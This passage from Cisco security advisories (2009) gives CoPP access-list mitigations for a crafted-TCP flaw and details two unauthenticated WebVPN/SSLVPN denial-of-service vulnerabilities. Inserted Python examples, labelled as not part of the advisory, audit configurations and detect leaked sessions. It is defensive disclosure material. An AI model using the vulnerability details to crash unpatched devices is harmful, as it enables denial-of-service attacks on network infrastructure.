    !--- Leverage the underlying protocols, DLSw, RSRB, etc.
    !---

    !---
    !--- Feature: DLSW
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 2065
    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 2067
    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any range 1981 1983

    !---
    !--- Permit DLSW traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so 
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 2065
    access-list 150 permit tcp any any eq 2067
    access-list 150 permit tcp any any range 1981 1983

    !---
    !--- Feature: RSRB
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any range 1987 1989
    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 1996

    !---
    !--- Permit RSRB traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so 
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any range 1987 1989
    access-list 150 permit tcp any any eq 1996

    !---
    !--- Feature: PPTP
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 1723

    !---
    !--- Permit PPTP traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so 
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 1723

    !---
    !--- Feature: RBP
    !---
    !--- RBP will listen for TCP connections on the configured port
    !--- as per "local port <port_number>".  The following example
    !--- uses port 1055

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 1055

    !---
    !--- Permit RBP traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so 
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 1055

    !---
    !--- Feature: XOT and X.25 Routing
    !---

    access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
         any eq 1998

    !---
    !--- Permit XOT and X25 traffic sent to all IP addresses
    !--- configured on all interfaces of the affected device so 
    !--- that it will be policed and dropped by the CoPP feature
    !---

    access-list 150 permit tcp any any eq 1998

    !---
    !--- Permit (Police or Drop)/Deny (Allow) all other Layer 3 and
    !--- Layer 4 traffic in accordance with existing security policies
    !--- and configurations for traffic that is authorized to be sent
    !--- to infrastructure devices.
    !--- Create a Class-Map for traffic to be policed by
    !--- the CoPP feature
    !---

    class-map match-all drop-tcp-class
     match access-group 150

    !---
    !--- Create a Policy-Map that will be applied to the
    !--- Control-Plane of the device.
    !---

    policy-map drop-tcp-traffic
     class drop-tcp-class
      drop

    !---
    !--- Apply the Policy-Map to the 
    !--- Control-Plane of the device
    !---

    control-plane
     service-policy input drop-tcp-traffic

In the above CoPP example, the access control list entries (ACEs)
that match the potential exploit packets with the "permit" action
result in these packets being discarded by the policy-map "drop"
function, while packets that match the "deny" action (not shown) are
not affected by the policy-map drop function. Please note that the
policy-map syntax is different in the 12.2S and 12.0S Cisco IOS
trains:

    policy-map drop-tcp-traffic
      class drop-tcp-class
        police 32000 1500 1500 conform-action drop exceed-action drop
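The permit/deny inversion between the iACL and the CoPP class ACL, worked through as an added example (not part of the Cisco advisory). It evaluates a subset of the ALPS and STUN entries with first-match semantics; the 192.0.2.0 and 198.51.100.0 ranges and the test packets are constructed stand-ins for TRUSTED_HOSTS and INFRASTRUCTURE_ADDRESSES, and the parser handles only the ACE forms used in this advisory.

```python
import ipaddress
from typing import NamedTuple, Optional, Tuple

# Constructed sample ranges (documentation prefixes) standing in for the
# advisory's TRUSTED_HOSTS and INFRASTRUCTURE_ADDRESSES placeholders.
TRUSTED = "192.0.2.0 0.0.0.255"
INFRA = "198.51.100.0 0.0.0.255"

# ALPS (350) and STUN (1990-1992) entries in the iACL form.
IACL = f"""
access-list 150 permit tcp {TRUSTED} {INFRA} eq 350
access-list 150 permit tcp {TRUSTED} {INFRA} range 1990 1992
access-list 150 deny tcp any {INFRA} eq 350
access-list 150 deny tcp any {INFRA} range 1990 1992
access-list 150 permit ip any any
"""

# The same features in the CoPP class ACL form: the actions are inverted.
COPP_ACL = f"""
access-list 150 deny tcp {TRUSTED} any eq 350
access-list 150 deny tcp {TRUSTED} any range 1990 1992
access-list 150 permit tcp any any eq 350
access-list 150 permit tcp any any range 1990 1992
"""


class Ace(NamedTuple):
    action: str                        # "permit" or "deny"
    proto: str                         # "tcp" or "ip"
    src: Tuple[int, int]               # (address, wildcard mask)
    dst: Tuple[int, int]
    ports: Optional[Tuple[int, int]]   # inclusive destination port range


def _take_addr(tokens):
    """Consume 'any' or 'ADDRESS WILDCARD' from the front of the token list."""
    if tokens[0] == "any":
        tokens.pop(0)
        return (0, 0xFFFFFFFF)
    addr = int(ipaddress.IPv4Address(tokens.pop(0)))
    wild = int(ipaddress.IPv4Address(tokens.pop(0)))
    return (addr, wild)


def parse_acl(text):
    """Parse 'access-list N ACTION PROTO SRC DST [eq P | range LO HI]' lines."""
    aces = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("!"):
            continue
        if tokens[0] != "access-list":
            raise ValueError(f"not an ACE: {line!r}")
        tokens = tokens[2:]            # drop 'access-list <number>'
        action, proto = tokens.pop(0), tokens.pop(0)
        src, dst = _take_addr(tokens), _take_addr(tokens)
        ports = None
        if tokens and tokens[0] == "eq":
            ports = (int(tokens[1]), int(tokens[1]))
        elif tokens and tokens[0] == "range":
            ports = (int(tokens[1]), int(tokens[2]))
        elif tokens:
            raise ValueError(f"unsupported qualifier in: {line!r}")
        aces.append(Ace(action, proto, src, dst, ports))
    return aces


def _addr_match(ip, spec):
    """Wildcard-mask match: bits set in the wildcard are 'don't care'."""
    addr, wild = spec
    care = ~wild & 0xFFFFFFFF
    return (int(ipaddress.IPv4Address(ip)) & care) == (addr & care)


def first_match(aces, src, dst, dport, proto="tcp"):
    """Return the action of the first matching ACE, else the implicit deny."""
    for ace in aces:
        if ace.proto not in ("ip", proto):
            continue
        if not (_addr_match(src, ace.src) and _addr_match(dst, ace.dst)):
            continue
        if ace.ports and not ace.ports[0] <= dport <= ace.ports[1]:
            continue
        return ace.action
    return "deny"


def iacl_verdict(src, dst, dport):
    """Interface ACL: the ACE action is the forwarding decision itself."""
    action = first_match(parse_acl(IACL), src, dst, dport)
    return "pass" if action == "permit" else "drop"


def copp_verdict(src, dst, dport):
    """CoPP: 'permit' classifies the packet into drop-tcp-class, which drops
    it; a 'deny' match or the implicit deny leaves it outside the class."""
    action = first_match(parse_acl(COPP_ACL), src, dst, dport)
    return "drop" if action == "permit" else "pass"


if __name__ == "__main__":
    # Constructed test packets: (source, destination, TCP destination port).
    for pkt in [("192.0.2.10", "198.51.100.1", 350),
                ("203.0.113.7", "198.51.100.1", 350),
                ("203.0.113.7", "198.51.100.1", 1991),
                ("203.0.113.7", "198.51.100.1", 22)]:
        print(pkt, "iACL:", iacl_verdict(*pkt), "CoPP:", copp_verdict(*pkt))
```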

Additional information on the configuration and use of the CoPP
feature can be found in the documents, "Control Plane Policing
Implementation Best Practices" and "Cisco IOS Software Releases 12.2S
- Control Plane Policing" at the following links
http://www.cisco.com/web/about/security/intelligence/coppwp_gs.html
and
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t4/feature/guide/gtrtlimt.html

Additional mitigations that can be deployed on Cisco devices within
the network are available in the "Cisco Applied Mitigation Bulletin"
companion document for this advisory, at the following link 
http://www.cisco.com/warp/public/707/cisco-amb-20090325-tcp-and-ip.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml 

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various 
languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was found by Cisco internal testing.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |               | Initial    |
| 1.0      | 2009-March-25 | public     |
|          |               | release    |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt

From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.webvpn@psirt.cisco.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco IOS Software WebVPN and SSLVPN
Vulnerabilities

Advisory ID: cisco-sa-20090325-webvpn

http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Revision 1.0

For Public Release 2009 March 25 1600 UTC (GMT)

---------------------------------------------------------------------

Summary
======
Cisco IOS software contains two vulnerabilities within the Cisco IOS
WebVPN or Cisco IOS SSLVPN feature (SSLVPN) that can be remotely
exploited without authentication to cause a denial of service
condition. Both vulnerabilities affect both Cisco IOS WebVPN and
Cisco IOS SSLVPN features:

 1. Crafted HTTPS packet will crash device.
 2. SSLVPN sessions cause a memory leak in the device.

Cisco has released free software updates that address these
vulnerabilities.

There are no workarounds that mitigate these vulnerabilities.

This advisory is posted at the following link: 
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml

Individual publication links are listed below:

  * Cisco IOS cTCP Denial of Service Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

  * Cisco IOS Software Multiple Features IP Sockets Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

  * Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

  * Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

  * Cisco IOS Software Session Initiation Protocol Denial of Service
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

  * Cisco IOS Software Multiple Features Crafted TCP Sequence
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

  * Cisco IOS Software Multiple Features Crafted UDP Packet
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

  * Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Affected Products
================
Vulnerable Products
+------------------

Devices running affected versions of Cisco IOS software are affected
if configured with SSLVPN.

To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
"show version" command to display the system banner. The system
banner confirms that the device is running Cisco IOS Software by
displaying text similar to "Cisco Internetwork Operating System
Software" or "Cisco IOS Software." The image name displays in
parentheses, followed by "Version" and the Cisco IOS Software release
name. Other Cisco devices do not have the "show version" command or
may provide different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:

    Router#show version
    Cisco Internetwork Operating System Software
    IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2008 by cisco Systems, Inc.
    Compiled Mon 17-Mar-08 14:39 by dchih

    <output truncated>

The following example shows a product that is running Cisco IOS
Software release 12.4(20)T with an image name of
C1841-ADVENTERPRISEK9-M:

    Router#show version
    Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2008 by Cisco Systems, Inc.
    Compiled Thu 10-Jul-08 20:25 by prod_rel_team

    <output truncated>

Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link: http://www.cisco.com/warp/public/620/1.html

To determine whether SSLVPN is enabled on your device, log in to the
device and issue the command-line interface (CLI) command "show
running-config | include webvpn". If the device returns any output,
SSLVPN is configured on the device and the device may be vulnerable.
Vulnerable configurations vary depending on whether the device is
supporting Cisco IOS WebVPN (introduced in Release 12.3(14)T) or
Cisco IOS SSLVPNs (introduced in Release 12.4(6)T). The following
methods describe how to confirm whether the device is vulnerable:

If the output from "show running-config | include webvpn" contains
"webvpn enable" then the device is configured with the original Cisco
IOS WebVPN. The only way to confirm the device is vulnerable is to
examine the output of "show running-config" to confirm that webvpn is
enabled via the command "webvpn enable" and that a "ssl trustpoint"
has been configured. The following example shows a vulnerable device
configured with Cisco IOS WebVPN:

    webvpn enable
    !
    webvpn
     ssl trustpoint TP-self-signed-29742012

If the output from "show running-config | include webvpn" contains
"webvpn gateway <word>" then the device is supporting the Cisco IOS
SSLVPN feature. A device is vulnerable if it has the "inservice"
command in at least one of the "webvpn gateway" sections. The
following example shows a vulnerable device configured with Cisco IOS
SSLVPN:

    Router# show running | section webvpn
    webvpn gateway Gateway
     ip address 10.1.1.1 port 443
     ssl trustpoint Gateway-TP
     inservice
     !
    Router#

A device that supports the Cisco IOS SSLVPN is not vulnerable if it
has no "webvpn gateway" sections configured, or if every configured
"webvpn gateway" section contains the "no inservice" command.
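
The two configuration checks above can be applied to a saved copy of
"show running-config". The following is an added example, not part of
the Cisco advisory; the function names are hypothetical, the third and
fourth sample configurations are constructed, and the result covers
the configuration only (the running release still has to be compared
against the fixed-release table).

```python
import re


def parse_sections(config_text):
    """Group an IOS running-config into (header, [child lines]) by indentation."""
    sections = []
    current = None
    for raw in config_text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        if line[0].isspace():
            # Indented line: belongs to the most recent top-level command.
            child = line.strip()
            if current is not None and child != "!":
                current[1].append(child)
        else:
            current = (line.strip(), [])
            sections.append(current)
    return sections


def audit_sslvpn(config_text):
    """Apply the advisory's two exposure conditions to a running-config."""
    sections = parse_sections(config_text)

    # Original Cisco IOS WebVPN: "webvpn enable" plus an "ssl trustpoint"
    # under the "webvpn" section.
    legacy_enabled = any(h.split() == ["webvpn", "enable"] for h, _ in sections)
    legacy_trustpoint = any(
        h.split() == ["webvpn"]
        and any(c.startswith("ssl trustpoint ") for c in kids)
        for h, kids in sections
    )

    # Cisco IOS SSLVPN: any "webvpn gateway <word>" section with "inservice".
    # "no inservice" is a different child line and does not match.
    in_service = []
    for header, kids in sections:
        m = re.fullmatch(r"webvpn gateway (\S+)", header)
        if m and "inservice" in kids:
            in_service.append(m.group(1))

    legacy = legacy_enabled and legacy_trustpoint
    return {
        "legacy_webvpn": legacy,
        "gateways_in_service": in_service,
        "vulnerable_config": legacy or bool(in_service),
    }


# Sample 1 and 2 mirror the advisory's own examples.
LEGACY_WEBVPN = """\
hostname Router
!
webvpn enable
!
webvpn
 ssl trustpoint TP-self-signed-29742012
!
"""

SSLVPN_IN_SERVICE = """\
webvpn gateway Gateway
 ip address 10.1.1.1 port 443
 ssl trustpoint Gateway-TP
 inservice
 !
"""

# Constructed samples: a gateway taken out of service, and a mixed case.
SSLVPN_OUT_OF_SERVICE = """\
webvpn gateway Gateway
 ip address 10.1.1.1 port 443
 ssl trustpoint Gateway-TP
 no inservice
 !
"""

SSLVPN_MIXED = """\
webvpn gateway GW-A
 ip address 10.1.1.1 port 443
 no inservice
 !
webvpn gateway GW-B
 ip address 10.1.1.2 port 443
 ssl trustpoint Gateway-TP
 inservice
 !
"""

if __name__ == "__main__":
    for name in ("LEGACY_WEBVPN", "SSLVPN_IN_SERVICE",
                 "SSLVPN_OUT_OF_SERVICE", "SSLVPN_MIXED"):
        print(name, audit_sslvpn(globals()[name]))
```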

Products Confirmed Not Vulnerable
+--------------------------------

The following products are not affected by this vulnerability:

  * Cisco ASA 5500 Series Adaptive Security Appliances
  * Cisco IOS XR Software
  * Cisco IOS XE Software

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
======
The Cisco SSLVPN feature provides remote access to enterprise sites
by users from anywhere on the Internet. The SSLVPN provides users
with secure access to specific enterprise applications, such as
e-mail and web browsing, without requiring them to have VPN client
software installed on their end-user devices.

The WebVPN Enhancements feature (Cisco IOS SSLVPN), released in Cisco
IOS Release 12.4(6)T, obsoletes the commands and configurations
originally put forward in Cisco IOS WebVPN.

Further information about Cisco IOS WebVPN is available in the "Cisco
IOS Software Release 12.3T WebVPN feature guide" at the following
link: 
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t14/feature/guide/g_sslvpn.html

Further information about Cisco IOS SSLVPN is available in the "Cisco
IOS Software Release 12.4T SSLVPN feature guide" at the following
link: http://www.cisco.com/en/US/docs/ios/12_4t/12_4t11/htwebvpn.html

Details regarding these two vulnerabilities in Cisco IOS devices that
are running affected versions of system software are:

Crafted HTTPS packet will crash device
+--------------------------------------

A device configured for SSLVPN may reload or hang when it receives a
specially crafted HTTPS packet. Completion of the 3-way handshake to
the associated TCP port number of the SSLVPN feature is required in
order for the vulnerability to be successfully exploited; however,
authentication is "not" required. The default TCP port number for
SSLVPN is 443.

This vulnerability is documented in Cisco bug ID CSCsk62253 
and Common Vulnerabilities and Exposures (CVE) identifier 
CVE-2009-0626 has been assigned to this vulnerability.

SSLVPN sessions cause a memory leak in the device
+------------------------------------------------

A device configured for SSLVPN may leak transmission control blocks
(TCBs) when processing an abnormally disconnected SSL session.
Continued exploitation may result in the device depleting its memory
resources and result in a crash of the device. Authentication is
"not" required to exploit this vulnerability.

The memory leak can be detected by running the command "show tcp
brief", as in the following example:

    Router#show tcp brief
    TCB       Local Address      Foreign Address     (state)
    468BBDC0  192.168.0.22.443   192.168.0.33.19794   CLOSEWAIT
    482D4730  192.168.0.22.443   192.168.0.33.22092   CLOSEWAIT
    482779A4  192.168.0.22.443   192.168.0.33.16978   CLOSEWAIT
    4693DEBC  192.168.0.22.443   192.168.0.33.21580   CLOSEWAIT
    482D3418  192.168.0.22.443   192.168.0.33.17244   CLOSEWAIT
    482B8ACC  192.168.0.22.443   192.168.0.33.16564   CLOSEWAIT
    46954EB0  192.168.0.22.443   192.168.0.33.19532   CLOSEWAIT
    468BA9B8  192.168.0.22.443   192.168.0.33.15781   CLOSEWAIT
    482908C4  192.168.0.22.443   192.168.0.33.19275   CLOSEWAIT
    4829D66C  192.168.0.22.443   192.168.0.33.19314   CLOSEWAIT
    468A2D94  192.168.0.22.443   192.168.0.33.14736   CLOSEWAIT
    4688F590  192.168.0.22.443   192.168.0.33.18786   CLOSEWAIT
    4693CBA4  192.168.0.22.443   192.168.0.33.12176   CLOSEWAIT
    4829ABC4  192.168.0.22.443   192.168.0.33.39629   CLOSEWAIT
    4691206C  192.168.0.22.443   192.168.0.33.17818   CLOSEWAIT
    46868224  192.168.0.22.443   192.168.0.33.16774   CLOSEWAIT
    4832BFAC  192.168.0.22.443   192.168.0.33.39883   CLOSEWAIT
    482D10CC  192.168.0.22.443   192.168.0.33.13677   CLOSEWAIT
    4829B120  192.168.0.22.443   192.168.0.33.20870   CLOSEWAIT
    482862FC  192.168.0.22.443   192.168.0.33.17035   CLOSEWAIT
    482EC13C  192.168.0.22.443   192.168.0.33.16053   CLOSEWAIT
    482901D8  192.168.0.22.443   192.168.0.33.16200   CLOSEWAIT

In the output above, those Transmission Control Blocks (TCBs) in the
state CLOSEWAIT will not go away and represent memory leaks. Please
note that only TCP connections with a local TCP port of 443 (the
well-known port for HTTPS) are relevant.
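
Because the leaked TCBs "will not go away", comparing two captures of
"show tcp brief" separates them from connections that are merely
closing. The following is an added example, not part of the Cisco
advisory; the function names are hypothetical, both captures are
constructed from lines in the format shown above, and the time
between captures is left to the operator.

```python
import re
from collections import Counter

# One data row of "show tcp brief": TCB, local addr.port, foreign addr.port, state.
ROW = re.compile(r"^\s*([0-9A-Fa-f]+)\s+(\S+)\s+(\S+)\s+([A-Z]+)\s*$")


def parse_tcp_brief(text):
    """Return {TCB: entry} for every data row; prompt and header rows are skipped."""
    entries = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        tcb, local, foreign, state = m.groups()
        entries[tcb.upper()] = {
            "local_port": local.rsplit(".", 1)[-1],   # "192.168.0.22.443" -> "443"
            "foreign": foreign,
            "foreign_host": foreign.rsplit(".", 1)[0],
            "state": state,
        }
    return entries


def stuck_closewait(earlier, later, port="443"):
    """TCBs in CLOSEWAIT on the given local port in BOTH captures."""
    first, second = parse_tcp_brief(earlier), parse_tcp_brief(later)

    def leaked(entry):
        return entry["state"] == "CLOSEWAIT" and entry["local_port"] == port

    return sorted(
        tcb for tcb, e in first.items()
        if leaked(e) and tcb in second and leaked(second[tcb])
        and second[tcb]["foreign"] == e["foreign"]   # same connection, not a reused TCB
    )


def stuck_by_peer(earlier, later, port="443"):
    """Count persistent CLOSEWAIT TCBs per foreign host."""
    first = parse_tcp_brief(earlier)
    return Counter(first[t]["foreign_host"] for t in stuck_closewait(earlier, later, port))


# Constructed captures (format as in the advisory's example output).
CAPTURE_1 = """\
Router#show tcp brief
TCB       Local Address      Foreign Address     (state)
468BBDC0  192.168.0.22.443   192.168.0.33.19794   CLOSEWAIT
482D4730  192.168.0.22.443   192.168.0.33.22092   CLOSEWAIT
482779A4  192.168.0.22.443   192.168.0.44.16978   ESTAB
4693DEBC  192.168.0.22.22    192.168.0.55.21580   CLOSEWAIT
482D3418  192.168.0.22.443   192.168.0.33.17244   CLOSEWAIT
"""

CAPTURE_2 = """\
Router#show tcp brief
TCB       Local Address      Foreign Address     (state)
468BBDC0  192.168.0.22.443   192.168.0.33.19794   CLOSEWAIT
482D4730  192.168.0.22.443   192.168.0.33.22092   CLOSEWAIT
4693DEBC  192.168.0.22.22    192.168.0.55.21580   CLOSEWAIT
482B8ACC  192.168.0.22.443   192.168.0.33.16564   CLOSEWAIT
482779A4  192.168.0.22.443   192.168.0.44.16978   ESTAB
"""

if __name__ == "__main__":
    print("persistent CLOSEWAIT TCBs on 443:", stuck_closewait(CAPTURE_1, CAPTURE_2))
    print("per peer:", dict(stuck_by_peer(CAPTURE_1, CAPTURE_2)))
```

A count that keeps growing across successive captures matches the
leak described above; entries on other local ports, such as the
port 22 row in the sample, are ignored.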

This vulnerability is documented in Cisco bug ID CSCsw24700 
and Common Vulnerabilities and Exposures (CVE) identifier 
CVE-2009-0628 has been assigned to this vulnerability.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss 

CSCsk62253 - Crafted HTTPS packet will crash device.

CVSS Base Score - 7.8

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 6.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed


CSCsw24700 - SSLVPN sessions cause a memory leak in the device.

CVSS Base Score - 7.8

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 6.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed

Impact
=====
Successful exploitation of either of the two vulnerabilities may
result in the device crashing, not accepting any new SSLVPN sessions,
or a memory leak. Repeated exploitation may result in an extended
denial of service (DoS) condition.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.

+-------------------------------------------------------------------+
|   Major    |          Availability of Repaired Releases           |
|  Release   |                                                      |
|------------+------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.0-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.1-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.2-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|-------------------------------------------------------------------|
| There are no affected 12.2 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.3-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|------------+--------------------------------------+---------------|
| 12.3       | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3B      | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3BC     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3BW     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3EU     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JEA    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JEB    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JEC    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JK     | Not Vulnerable                       |               |
